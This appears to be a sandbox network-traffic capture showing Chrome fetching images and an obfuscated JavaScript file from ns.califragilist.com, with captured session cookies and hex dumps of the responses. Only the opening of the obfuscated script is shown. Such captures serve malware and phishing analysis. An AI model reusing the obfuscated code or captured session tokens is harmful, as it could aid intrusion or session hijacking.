                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              74192.168.2.1849852188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:03 UTC1365OUTGET /wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:03 UTC1021INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:03 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 644
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=weMdbhvdDHG8h2SyCOXXnpPi8lAfT2HuMcDpBfWMi7YeRc%2BBYtpMZCETmB3eZ3iQV7E4fYCeat4tPQ%2BYmpCBtSpom3lUE0UfVOXDYZ0zPmHgo3iwATBUuR%2FaDNmewQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3278&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2286&delivery_rate=867845&cwnd=251&unsent_bytes=0&cid=cd0eaec916c5c7b3&ts=98&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de64577ec136ba6-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1943&delivery_rate=2538124&cwnd=243&unsent_bytes=0&cid=904e5b61659cb993&ts=497&x=0"
                                                                                                                                              2024-11-06 15:56:03 UTC348INData Raw: 52 49 46 46 7c 02 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 17 00 00 17 00 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFF|WEBPVP8X0ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:03 UTC296INData Raw: b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 4b 00 00 00 01 57 60 24 92 d4 f4 9f 7a f9 80 22 0d 59 88 88 50 7d 30 3b 07 50 45 b2 92 47 0b 12 68 00 c6 06 8c 39 88 40 0a 8d 60 03 93 32 ef 8b 00 11 fd 9f 00 f4 3d 99 54 e6 0a 91 0a f2 2d 33 b3 ea 6f 77 f7 2a 14 ec 11 26 94 c1 a0 da 05 00 56 50 38 20 3a 00 00 00 30 03 00 9d 01 2a 18 00 18 00 3e 6d 26 9b 4d a4 21
                                                                                                                                              Data Ascii: XYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPHKW`$z"YP}0;PEGh9@`2=T-3ow*&VP8 :0*>m&M!


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              75192.168.2.1849851188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:03 UTC1136OUTGET /klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:03 UTC1077INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:03 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6O71dAeS%2Blbhjt%2BrBmzJFb%2F%2Bnh%2BOwHTHCJYpz4kSxRUcwwm4EMBHoqNjGcYhVb7rJTboP2pQiZPVoSIscLrto%2F5sn4hAMoqtx2FMPu8AecEBaobTCeupxO7eSNTXRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3426&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2057&delivery_rate=834582&cwnd=251&unsent_bytes=0&cid=2f94892e730900c7&ts=85&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de64577fbaa0ba1-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1714&delivery_rate=2032280&cwnd=251&unsent_bytes=0&cid=2a4b2748c60cdb46&ts=481&x=0"
                                                                                                                                              2024-11-06 15:56:03 UTC292INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                                                                                                              Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31 38 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 42 29 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 34 38 2e 36 20 31 38 38 35 2e 32 63 36 33 31 2e 39 32 20 30 20 31 31 34 34 2e 32 2d 34 31 37 2e 34 35 20 31 31 34 34 2e 32 2d 39 33 32 2e 34 53 32 31 38 30 2e 35 32 20 32 30 2e 34 20 31 35 34 38 2e 36 20 32 30 2e 34 20 34 30 34 2e 34 20 34 33 37 2e 38 35 20 34 30 34 2e 34 20 39 35 32 2e 38 73 35 31 32 2e
                                                                                                                                              Data Ascii: .2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.
                                                                                                                                              2024-11-06 15:56:03 UTC210INData Raw: 39 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 34 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 45 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 30 20 30 68 31 39 32 30 76 31 30 38 30 48 30 7a 22 2f 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 2f 64 65 66 73 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                              Data Ascii: 9.8)"><stop stop-color="#d83b01" stop-opacity=".75"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><clipPath id="E"><path fill="#fff" d="M0 0h1920v1080H0z"/></clipPath></defs></svg>
                                                                                                                                              2024-11-06 15:56:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              76192.168.2.1849853188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:03 UTC1351OUTGET /qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:03 UTC1015INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:03 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 892
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XiNRaCJbFEq%2FU657V%2B8VdFDDptPzBonepxhsENwaIgyG7GYksk6SCXQGL%2BXIoGRwPpmKmOx%2F%2F5wVGPm0gJLPBtAZ3lBrW1EmojeFptg4S31v%2Faal17WEvYmZ1%2BmhdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3372&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2272&delivery_rate=866806&cwnd=251&unsent_bytes=0&cid=21ffca67c2c7e7a0&ts=142&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de645781c6f6c6f-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=998&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1929&delivery_rate=2691449&cwnd=251&unsent_bytes=0&cid=a0ba5f6f5d09b4ca&ts=543&x=0"
                                                                                                                                              2024-11-06 15:56:03 UTC354INData Raw: 52 49 46 46 74 03 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 2f 00 00 2f 00 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFFtWEBPVP8X0//ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:03 UTC538INData Raw: 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 3d 01 00 00 0d 80 96 6d 5b dd e6 9d 83 48 c0 41 bf 29 18 55 10 a2 80 d6 41 a3 a0 43 01 75 40 ab 20 89 82 11 07 4c c1 90 80 83 9e 0b 1f 3b ff 8b 08 05 92 24 33 7b 32 7b 2e f0 09 fc 33 a4 a1 56 36 08 69 de 57 c2 46 df 68 a2 e6 65 65 5e 6b ac 3a c0 cf 63 6c 88 5a da aa 65 62 d7 01 c9 04 00 29 84 49 5a 1a 9e b9 c5 21 ac 1f 18 b1 3b 58
                                                                                                                                              Data Ascii: XYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPH=m[HA)UACu@ L;$3{2{.3V6iWFhee^k:clZeb)IZ!;X


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              77192.168.2.1849856188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:03 UTC1098OUTGET /34ZDG48CiIUIKX2LghMRxuoYEP67110 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:03 UTC1045INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:03 GMT
                                                                                                                                              Content-Type: application/javascript
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="34ZDG48CiIUIKX2LghMRxuoYEP67110"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFsc6o6MrmcT7%2F%2FYgxXqbSehzuMERFNXlwUc7XtevpZRb9jrt7dbv5BnfJj0lttQ1nUBKXWcO%2BPEHjLxXJi5jePq8ddhwNatk0cc6Cz4dJE0TPYRWTYX53UkKft5LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12414&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2020&delivery_rate=229950&cwnd=58&unsent_bytes=0&cid=0c516a22e723340f&ts=142&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6457a2c12eb33-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1437&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1676&delivery_rate=2049539&cwnd=244&unsent_bytes=0&cid=778e414750802a00&ts=560&x=0"
                                                                                                                                              2024-11-06 15:56:03 UTC324INData Raw: 33 37 39 32 0d 0a 63 6f 6e 73 74 20 5f 30 78 31 65 66 30 31 39 3d 5f 30 78 32 32 65 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 32 66 66 65 31 2c 5f 30 78 33 39 65 61 32 38 29 7b 63 6f 6e 73 74 20 5f 30 78 34 36 30 39 63 61 3d 5f 30 78 32 32 65 39 2c 5f 30 78 33 66 32 61 37 34 3d 5f 30 78 34 32 66 66 65 31 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 30 32 34 32 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 31 39 30 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 61 61 29 29 2f 30 78 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 32 31 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30
                                                                                                                                              Data Ascii: 3792const _0x1ef019=_0x22e9;(function(_0x42ffe1,_0x39ea28){const _0x4609ca=_0x22e9,_0x3f2a74=_0x42ffe1();while(!![]){try{const _0x102423=-parseInt(_0x4609ca(0x190))/0x1+parseInt(_0x4609ca(0xaa))/0x2*(-parseInt(_0x4609ca(0x210))/0x3)+parseInt(_0x4609ca(0
                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 2f 30 78 36 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 32 36 61 29 29 2f 30 78 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 31 62 38 29 29 2f 30 78 38 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 31 34 38 29 29 2f 30 78 39 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 66 63 29 29 2f 30 78 61 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 32 35 35 29 29 2f 30 78 62 29 3b 69 66 28 5f 30 78 31 30 32 34 32 33 3d 3d 3d 5f 30 78 33 39 65 61 32 38 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 33 66 32 61 37 34 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 66 32 61 37 34 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 31 61 31 61 30
                                                                                                                                              Data Ascii: /0x6+parseInt(_0x4609ca(0x26a))/0x7*(-parseInt(_0x4609ca(0x1b8))/0x8)+parseInt(_0x4609ca(0x148))/0x9+parseInt(_0x4609ca(0xfc))/0xa*(parseInt(_0x4609ca(0x255))/0xb);if(_0x102423===_0x39ea28)break;else _0x3f2a74['push'](_0x3f2a74['shift']());}catch(_0x1a1a0
